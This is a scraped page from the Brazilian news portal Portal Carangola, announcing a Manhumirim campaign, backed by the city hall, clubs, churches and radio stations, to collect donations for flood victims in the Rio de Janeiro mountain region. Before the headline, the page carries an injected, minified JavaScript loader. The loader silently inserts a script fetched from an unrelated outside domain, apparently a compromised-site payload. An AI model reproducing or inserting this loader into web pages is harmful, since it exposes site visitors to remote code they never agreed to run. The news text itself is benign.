;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); “Toneladas de Solidariedade – Manhumirim em prol da vida!” - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

“Toneladas de Solidariedade – Manhumirim em prol da vida!”

A Prefeitura de Manhumirim, entidades sociais, clubes de serviços, igrejas, policia militar e povo em geral, vão realizar neste sábado, dia 29 de janeiro, o D, de arrecadação de donativos para as vítimas da catástrofe na região serrana do Rio de Janeiro. Na última quinta – feira, dia 20, aconteceu uma reunião na Prefeitura de Manhumirim, contando com a participação do prefeito Ronaldo Lopes Correa. A unidade de todos foi  idealizada pela dinâmica professora, Eloísa Tostes,  com  objetivo de dar as mãos, unir forças para arrecadar o máximo possível de doações. Estiveram presentes representantes do Leo Clube, que já vinha realizando a campanha percorrendo os bairros e ruas da cidade, Rotary Clube,  Lions Club, Rotaract, Polícia Militar; Igreja Presbiteriana; Rádio Manhumirim e Prefeitura.

A campanha “Toneladas de Solidariedade – Manhumirim em Prol da Vida!” visa arrecadar donativos para auxílio às vítimas das chuvas na região serrana do Rio de Janeiro. A igreja católica de Manhumirim através do Pároco, padre Edimar Caixeta, também está empenhada na campanha. Todos podem doar o que puder. As pessoas interessadas em ajudar podem procurar um dos postos de arrecadação. Sendo eles: Escritório Paroquial, Rádio Manhumirim, Supermercado Vidal e outros que ainda serão definidos.  A campanha conta com total apoio das emissoras da Fundação Bom Jesus, rádios Manhumirim Am e Terra FM e Prefeitura de Manhumirim.

Valdir Vieira – Assessoria de Comunicação – Prefeitura de Manhumirim.

Ofertas


Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.